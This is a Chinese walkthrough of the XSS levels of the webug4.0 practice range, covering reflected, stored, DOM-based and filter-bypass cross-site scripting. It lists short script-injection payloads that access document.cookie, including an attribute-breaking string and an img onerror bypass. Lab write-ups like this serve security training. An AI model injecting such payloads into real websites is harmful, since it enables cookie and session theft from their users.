zoukankan      html  css  js  c++  java
  • webug4.0靶场通关之XSS

    0x00 反射型XSS

    以进入页面就寻找搜索框,发现有个放大镜点着没有反应
    在这里插入图片描述
    但改URL中的id进行搜索
    Payload:

    <script>(document.cookie)</script>
    

    在这里插入图片描述

    0x01 存储型XSS

    下拉置底部留言板处
    在这里插入图片描述
    提交xss一句话留言
    Payload:

    在这里插入图片描述

    0x02 Dom型XSS

    看到搜索框,F12查看元素
    在这里插入图片描述
    搜索框的输入是给value参数传值,根据dom结构构造payload:

    " > <script>alert(document.cookie)</script>#
    

    " >:闭合前面的标签
    #:注释掉后面的require等字符
    在这里插入图片描述

    0x03 过滤XSS

    发现过滤了很多字符
    用bp fuzz一下payload
    最后用这个Payload绕过:

    <img src=1 onerror=alert(document.cookie)>
    

    在这里插入图片描述

    你是这白开水一样淡的日子里偷偷加的一颗糖~~
  • 相关阅读:
    第五周上机作业
    第四周练习
    第八周上机练习
    第七周作业
    第七周上机练习
    第六周作业
    第六周上机练习
    第五周上机作业
    第四周作业
    第四周上机练习
  • 原文地址:https://www.cnblogs.com/0nc3/p/12063449.html
Copyright © 2011-2022 走看看